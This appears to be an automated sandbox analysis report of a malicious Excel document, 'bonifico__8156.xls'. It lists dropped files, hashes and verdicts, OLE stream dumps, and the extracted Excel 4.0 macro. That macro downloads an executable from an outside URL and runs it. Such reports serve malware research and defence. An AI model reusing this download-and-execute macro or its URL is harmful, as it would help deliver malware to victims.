Preview:	mEDkZvsIRGutNycgbCmzlEOely6z8S1P2xoM5FKt3fX9ap1EgNUw3Il2C1gtqCbfN0/vP0MHvS30ojb98AJj6s10d4vVivBskNvvuV8s98qTBguPN2CSV7WvamNbHHUA38jMCiPSuO8Cv8Ax0Ou2xdJgCleaDreIAH2fsE3FJaokCFbaHBSnUVuXtiOA0JPUkMwfRotTjKLKvDQZlg6VhRwdzYA0hucvYZDQKngmL+nw9WeGhH9iWugs0GjAFsrN8zfFQ+yYeh2HYK3bdnexGG65HkZ4oPHneSH60sBTJ18YvfPqFTBIFaMISSmXObtdepR4sxIPE2Zh//yZGcffIS3ctliVE5zpVlZl33fPNXpTTtmUdpUkSUoitlVRHVz9a+wp42jmJ2fYE/BeHZ1xSeIcvYZf0X/+FJYTU50vgFgknx0kj4eCuFbpKQrlXs4Nvy1U30uQNteqylAZqotxFG26xorAT7U9Jl35NK5FvHnc1Ik4qPl8LYttRS5S3mrEOQOgnN3j7EJZ4pElDwDZBFzAlLOSO+OwwjtE51HEcrEJd7P8iXB8NiurDBLi6o5n4Yn0ymc5Rm4pSpPvHjbltnIALWamxVoihsWDy+5xMmJI0HGDwUi62WPYkZDCkrIq/1f4TtRI6bH/7SQ6ks5yETsTLMOBu/TalykZ2L2cwKFyIbH/zTF/F0E+94X+f5OGYQGVHbkWJ8fvVpfj5FoxXJtB0lD7oBfiG34k8ABnoawhzymmCcc6K+L8ocRgBmc6aTMPDoNVzykrWAIlPiiM+ginOTO9VHXSVgsKiQAVnVXtHl4gqE2PcQeoER/Zog9+4aSbg+fE1P5ouGuQSPSN/bJs5VSlkK1/bH4bIPoJS3YDy9etfS7Y2wOGWlkNLZXGazbd1fqKqu7UgivzT08PrYeee1VlFcEIO46m0CF1vCvPOu0m0M2/ZT6Pmw15a6YeLeRA2wQT15jxKEH+kuJW6zIhV5x3tRBk127CyYoK

C:\Users\user\AppData\Local\Temp\11040000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Size (bytes):	43771
Entropy (8bit):	7.717529555627393
Encrypted:	false
MD5:	5570DB9180D97C62E122346D8489C91B
SHA1:	F75AEC3914A9612EF4CA8F6C29E44F6A1351621C
SHA-256:	09E97EA27A97BD0CF9C675B4CBD7B11CF4C5D20E1796EE486CD29F595BDA4E93
SHA-512:	2DB4DA7CA3A75085DE396E1B00E22DBBC2F6B0F3296608F843F711107D25FF9E1C9613870BDFB0E6A4C181A960284FAF9BA7448A30545D72FC411302F67915E1
Malicious:	false
Preview:	..N.0...'..".N.k.g..r...@.{.c.6Q...1..........I...\|.8.....:[.B....j..p...j...<b.&..A...t....j...\.fMJ.s..t.+.....J.2.xPz.f..ht.w.\S.M.?a.nl.....$.EV.XM.j.B..V)..[g.....U...`....1...</p_w..&...K../.e............&=e.%,4....TuJG....<.Z.@...0.(E>......[d...U...\...`....0DPf...j..G.......="..D8..p....N....1..1.......'.T,UP.TA.T..W.TlUP.UA.X..g.T.URqVI.Y%.g.T.URqV.Y.....p\|..2..........j.M.Q....s......~.#./.........C..W.!7..ZX.....b.I...'1...m>$?.........PK..........!.}.......:.......[Content_Types].xml ...(..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF01C7FE32D5228BBB.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Size (bytes):	12933
Entropy (8bit):	0.4079387795560523
Encrypted:	false
MD5:	3F7540FA7ACC3E012E39E7B1CD6502DD
SHA1:	99706B0059F1436F5CAB84CF7C14391A6A2749B0
SHA-256:	7BC128113F8C3645B88BBADF1A7881819450753D63A63ADCF3107D37E2275706
SHA-512:	C81CA9D1C9F8E78E08D0D07085961D6CDD0C38E1CA2329A03FFDF3A2600D703E7EDCFBADC20EE2FB84AEE21B70D2A83B69302D47A7EB930D4B03273945070DCD
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF183F3168A523DBCE.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Size (bytes):	12933
Entropy (8bit):	0.4070989065428855
Encrypted:	false
MD5:	10E79D6F8C4F6A764E9F3183BD6D1767
SHA1:	652FA0AE3CED20E7BA3EBAC668DA113D92C475DD
SHA-256:	83285A4BF50671F80849332D8434C6D47F9A6D05062E801FAEA0F2CC8260C054
SHA-512:	4ACF769B868969D6E0D7205A792A40963DF60C27ABDF03402A0AD98BB6D89161464C2E5E6D73FA0500482898544495CE7D0F59EEC5A8A2C2F3092D280325E0C8
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF3896705D8593058C.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Size (bytes):	39425
Entropy (8bit):	0.5246380037115375
Encrypted:	false
MD5:	58AEE6937664B277F9F6D05047B55E69
SHA1:	72FDEA99D8319D6125435AB6FEEA7C0173C13F4D
SHA-256:	4F998F2FE3C07552670A8665CED591D58F372A567C05E0B6F9A3729E044567CC
SHA-512:	B19737B90A2A5FC03D8E4FF6490C6547C19B2D694186072819CDAA2E4A1CA7D0177DAD51837D7CB653DD932F82EF6BBAB3118352850B1D9F13C42A65EAD9917F
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF6AB2BD013C3ADF75.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Size (bytes):	12933
Entropy (8bit):	0.4089838151229601
Encrypted:	false
MD5:	022B93F22D735ED3D9ABBF8603122926
SHA1:	6543A2E4F119317A2A9C62ACB11D7C86F4424D55
SHA-256:	BFB52F3E0A4B9EF105775870C33C39C1F8B5C7138522A6DE6683F6AA73057F77
SHA-512:	27B808851D4083E125C530794DA0A1F111B4DE3AC37D6808525DD2605E1D5BADC38DB71A68A068AF265C1AFC347DF3563E72A1323D4C7A9BB440B58D9151E04B
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFCFF86C6514EEAE54.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Size (bytes):	39433
Entropy (8bit):	0.5281067059456119
Encrypted:	false
MD5:	9059711BC33885D30CA892F6C0585BE1
SHA1:	FE39776AB001D613536ABF3D573754FDE3F1A2E2
SHA-256:	F63B956429DED8FA5AAAB2D59001F9C47410251BF011758848495137391FDA44
SHA-512:	FC3AE7336231BE0711A80F0D4F48B408AAE72865E3E6989E8F6188F1581791B62D9073E88A7C300F0BF28FBF06618A3A90212DF30A28964E196EA5BC1A67AC33
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD56FBC71608E4C72.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Size (bytes):	39409
Entropy (8bit):	0.5246884694212391
Encrypted:	false
MD5:	93CCA80603B1941072148F08BD140FA4
SHA1:	8A83DFBAE0CEE90062DB5B4BAE686FE1A4090B5F
SHA-256:	2B2116A9DE9B922268BA698C3C5106BFF355F583822B85EBDA85B7DB04AD54FB
SHA-512:	9A25FA50F2C4D96F0C04E78BD98101116D5AEFB3A53B4BBCF4455B33C744143BA9E14BA30F4E1175C67EF21FA8699E59A4594A2C87AF7F9BA8DC7BAEAF613398
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFE24F9FD674AAD18C.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Size (bytes):	39441
Entropy (8bit):	0.5308369857978517
Encrypted:	false
MD5:	844105A1007EE6A407D572EB4E3EC8C4
SHA1:	FE0C03238C0FB472D516C900CD9EC67BE5D59098
SHA-256:	D626C94AB4BAFCE151CA4CC75C5DA409E4B99B7DC28E96DC87A55736DAADE63A
SHA-512:	73418A32495CCF82222CC1960268857221CCF4BEA89A4741AA696B1FAC9920C52386832237EACE9311E7DAB3DE44F207430A5A4DA8A078E02826475A4AB9118C
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFE48A7EFB83FBE73D.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Size (bytes):	12933
Entropy (8bit):	0.40989322128747746
Encrypted:	false
MD5:	9170DCD04BE876B05A955AC7A93A4963
SHA1:	4B93FB31755EE3DDB330DB1283993B7C8F6EEC18
SHA-256:	0741CDD9BEF3AC2A9563A17ABBF9A1EA4DEA3A9B9C4998055FB673B80E714C44
SHA-512:	94C469F4C35E8236F04D2741E2A0CBE7B80B686EBA7D6A2F85376E7EA7AB38234FE7896F96372916C7C97AE276F2E8A0ED894C3CB610E98DF7C579B340B6F43E
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFEBC96C84E855B5C9.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Size (bytes):	12933
Entropy (8bit):	0.4075232346794347
Encrypted:	false
MD5:	D44F0A788E4A7313CADAB752444A0B8B
SHA1:	D865A6034966F6702CC12CF15D6CA1D22AA8DF3B
SHA-256:	28BBCCE189620962558D16D0C147618D45FE8CC9C7EF6239C0654AFAC870C565
SHA-512:	A92D591AD198076C101DF298114CCB64F0585FA06192B7859DAB0CC1922498CAE044016FFDA8A64B3AC8C209FF112C3AF6CC8097E43EBB804CAF21BCE954711A
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFF46CD307380CEEF6.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Size (bytes):	39465
Entropy (8bit):	0.5342550819668758
Encrypted:	false
MD5:	AA18DDA23E854E8C35FD9FA3CAEFC7AA
SHA1:	4A6512995992948367EFC1D2BD5EE2FA0A6DD13A
SHA-256:	8484BD9438AD658634BED28066FBF18B63D24919A82B47C6A97DA5821963BA29
SHA-512:	C74F341295A1457ACCE6FED34010B6C6BAB12F64A603D7E7FDDCCCD3954C7DD6BA7E20C717F4D310CB0C505FBB2834246B2E3C29C17D9C9D043089BD541B2D71
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu May 23 21:41:59 2019, mtime=Wed May 27 07:30:44 2020, atime=Wed May 27 07:30:44 2020, length=8192, window=hide
Size (bytes):	363
Entropy (8bit):	4.426372695117128
Encrypted:	false
MD5:	C90159333A5A447E1BC4F5BC8B87A984
SHA1:	6430855477EB175D3FDA414B309CF64F1E0F6725
SHA-256:	D65DCF0DE1B1E80CFAF053DD0FD8B44174ED1602F9FA40A865B41688A025A9CA
SHA-512:	629B962BF549F8E2ABFD0E57FCC413FF25ADE2863315B208EF01DD88D64F1ABA799F5FB82D62BED0A597B802A9F5F7C26A7341741D4D89A5DF8E24A7DE9CA582
Malicious:	false
Preview:	L..................F.........<Z......."..4.......4... ..........................D...............-.......C...........m..Z.....C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.`.......X.......928100..............x..C..Z.;....i.}..............x..C..Z.;....i.}..........E.......9...1SPS..mD..pH.H@..=x.....h....H....X/:......`"................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\bonifico__8156.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Mar 18 14:04:05 2020, mtime=Wed May 27 07:30:44 2020, atime=Wed May 27 07:30:44 2020, length=37650, window=hide
Size (bytes):	1068
Entropy (8bit):	4.630446288411388
Encrypted:	false
MD5:	5609B787F575C8F08F88626166527B05
SHA1:	2BCF622FB904B80D65F6259A28C6DE59DF4B39F4
SHA-256:	5F719BA0F99E668540EF28F5AF2749105C22B2C0E15DF6E13D6CFA48151F8E8C
SHA-512:	BDF4901033D8F7A96CD5964F3B3BDA881789AFE36AC2AFCFDFE0A2DCAAACE877C84267D1C7A37B998600B003A61130B55CB04AC95C9B5E1F61EA7E10D8759925
Malicious:	false
Preview:	L..................F.... .....jw6...y`w..4..yRS..4..........................t.r.2..j...P.C .BONIFI~1.XLS..V......rP.x.P.C..............................b.o.n.i.f.i.c.o._._.8.1.5.6...x.l.s.......W...............-.......V...........m..Z.....C:\Users\user\Desktop\bonifico__8156.xls..).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.b.o.n.i.f.i.c.o._._.8.1.5.6...x.l.s.`.......X.......928100..............x..C..Z.;...-.C)i..............x..C..Z.;...-.C)i..........E.......9...1SPS..mD..pH.H@..=x.....h....H....X/:......`"................L..................F.... .....jw6...y`w..4..yRS..4..........................t.r.2..j...P.C .BONIFI~1.XLS..V......rP.x.P.C..............................b.o.n.i.f.i.c.o._._.8.1.5.6...x.l.s.......W...............-.......V...........m..Z.....C:\Users\user\Desktop\bonifico__8156.xls..).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.b.o.n.i.f.i.c.o._._.8.1.5.6...x.l.s.`.......X.......928100..............x..C..Z.;...-.C)i..............x..C..Z.;...-.C)i..........E....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	95
Entropy (8bit):	4.670018008423766
Encrypted:	false
MD5:	3CF3D27E503A9759024FEB299D7E35BE
SHA1:	6C9FF775588543C6D59D7E45094819A2FF652EBF
SHA-256:	BBC77B7BDABA8CB59A4EFD7C9115B5EAC89D635DCC83A7EC0A9197D788D453A7
SHA-512:	10BBB1126FB0C8F270BEC038A2FC298F9615DE38B8388BF1F54D40EF259FDCADC2DE8D7A4BE853307153A20CBC31CD44B7409414C959A1CEB67493E508A6020A
Malicious:	false
Preview:	Desktop.LNK=0..[xls]..bonifico__8156.LNK=0..bonifico__8156.LNK=0..[xls]..bonifico__8156.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	Little-endian UTF-16 Unicode text, with CR line terminators
Size (bytes):	16
Entropy (8bit):	2.6556390622295662
Encrypted:	false
MD5:	7C2BCD8D62C7D1E49DDD33CE20876267
SHA1:	B09141445851302075E4A46F9F48998FF8695857
SHA-256:	940436D80A7A518EC2740082FFBBA23DCC0F3A5F6D25F4C9A912949DBBDC9606
SHA-512:	C67FC36383FC25401169CDFA75B9872A207C8AB8DFC0BE1A0DA4DA5E7D62B7F0720A9E09588A570780232B1176D9C547251CA26B4759D391CBF3CCBEEA1DF3F3
Malicious:	false
Preview:	....L.y.n.n.....

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\prefs.js Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	48
Entropy (8bit):	4.5165414066556515
Encrypted:	false
MD5:	4DAA07115C67BED12909C4DFEA867BAD
SHA1:	24ED93A0A23D41448CB8CF1F72127EEFF07D242E
SHA-256:	F067EB85E0B4B3DB1C17A209B84D049551AB016098E2F6788E400298C5A4D0CA
SHA-512:	7A1910448F8FA5E33FDC26519419E66BA1365E7B2F79760836A8A48947C1CF6D769DDDA2665DCE464F9F84B4680458573889A45017C3E0E584408A6E2421EA51
Malicious:	true
Preview:	..user_pref("network.http.spdy.enabled", false);

C:\Users\user\Desktop\64040000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Size (bytes):	37650
Entropy (8bit):	7.645162520454406
Encrypted:	false
MD5:	987FBAC84849745FE400BD1593C09478
SHA1:	765C693B60DE7B2226B972FEA43F698EC4595891
SHA-256:	1355065A85220253C6EB8AE3BA604260A4FC020F1A8CFA94FC035114D76038CD
SHA-512:	D7FF5D38BC08CCD89093FAC85D5DC6D574D42BD6982867E073EEED11B3E833A86F221D1082C67C3D5B7850453729545CD5C91B0891281A17F57AEAA7D3F1280B
Malicious:	false
Preview:	.]O.0...M..Ko.+..h.\.q.$....-lm....oW>b.B.$..5[..>;..oo...d..Ze..m...,.$#...V.$..%E..dd.........K.n.2Rxo.(uy..p.6...X.Z.pk'.\|&@y...V..o......`,f.O.....B.H.Z.heD.S.........Z+.ag\....A.N.f.o......[JH...WQ......O....";(.x\. u>.C.Rg,...._Wi..Z.j.G?.v4... ....Grp$..H8n.p.".. .C..E.q......`qT..R..OeXL.aqU..V.._eX..aqV..Y9..U,..8+.....r,....Y}8.....?.X.....e.....X..r!,.woC.qv....q.d`h.q!#.p\|.6!H..eB!...m..+N..\|..C..H.;.iL..........PK..........!.........r.......[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$bonifico__8156.xls Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Size (bytes):	165
Entropy (8bit):	1.3277743159347326
Encrypted:	false
MD5:	6D40A994B3BA0550789C9E197FAFC3B3
SHA1:	8ADB7C25BE44C1685311405EFA53DEB0C9417665
SHA-256:	7D64C2B772FAD75735CF333A5FC89502BB5E0EE98403B9AFC3BFC017FB8A7A8C
SHA-512:	E2509BCECF4337E4DE83727A334B4AD6575A037E87A43AB9865476C00BACED607921232F532711CD9EA517FA63CC47AD1E0D8D48FFEC5D94C0A2A75DB7D19D3C
Malicious:	true
Preview:	.user ..L.y.n.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\sxibiNa\ZpsvnMb\CVPFktt.exe Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	167424
Entropy (8bit):	6.906520340690913
Encrypted:	false
MD5:	7494B31AF8F89F1051C7E9332FF7D331
SHA1:	258A679E71464F9422F6E0A6909CE47DA5A05EE6
SHA-256:	4A6604CB3A9A6570EAACFFB681B3CCD28D2521F03BB449F1A205525DD8172046
SHA-512:	7C55E2919E25D8112D6E6D8F711D3FF602511206E9F37D54F6197690F2FB5BD4BBD2AF63E79BE4D6DC66DC711DA8E4621081644B6FCEFE7FDF5D421992BBB832
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L...Ka.].....................VD.....s.............@...........................F......2..........................................(....pE.P...........................@................................................................................text............................... ..`.data... sC......,..................@....pevidu......PE.....................@....rsrc...P....pE.....................@..@................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue May 26 21:41:43 2020, Last Saved Time/Date: Wed May 27 00:28:21 2020, Security: 0
Entropy (8bit):	4.589570848265452
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	bonifico__8156.xls
File size:	92672
MD5:	d3eeee7a0df0b673fdbd95910056a94c
SHA1:	4aeecf039e6c6c8e16be12735d0f616f6ebb28f1
SHA256:	c4583a46aa63ef15468b62d2c352e00ca3e6718aa2f8897c6093d67b5b42de20
SHA512:	14d90ffb6fde7a875992df353b738d3508372f267ede4609ac0f4e5eee11a5e58f84626fc93f54eecbee935ba08b304cb066550f43124c499fdc246fcff7c8dc
SSDEEP:	1536:aYyk3hbdlylKsgqopeJBWhZFGkE+cL2NdAl+KlXDNUarIEbqjyeLhEabiiLgh:aXk3hbdlylKsgqopeJBWhZFGkE+cL2Nu
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	74ecd4c6c3c6c4d8

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "bonifico__8156.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Author:
Last Saved By:
Create Time:	2020-05-26 20:41:43
Last Saved Time:	2020-05-26 23:28:21
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1252
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.776996438278
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O H O s F F U Y . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . S h e e t 5 . . . . . S h e e t 6 . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 20 02 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 db 01 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.250492291218
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . 3 . . @ . . . . . . W . 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 81951

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	81951
Entropy:	4.93164062277
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . 6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

CALL(Kernel32, CreateDirectoryA, JCJ, C:\sxibiNa, 0)
CALL(Kernel32, CreateDirectoryA, JCJ, C:\sxibiNa\ZpsvnMb, 0)
CALL(URLMON, URLDownloadToFileA, JJCCJJ, 0, http://gstat.ddoborguild.com/0n1ine.exe, C:\sxibiNa\ZpsvnMb\CVPFktt.exe, 0, 0)
CALL(Shell32, ShellExecuteA, JJCCCCJ, 0, Open, C:\sxibiNa\ZpsvnMb\CVPFktt.exe, , 0, 0)

,,=RUN($BT$586),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,82,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
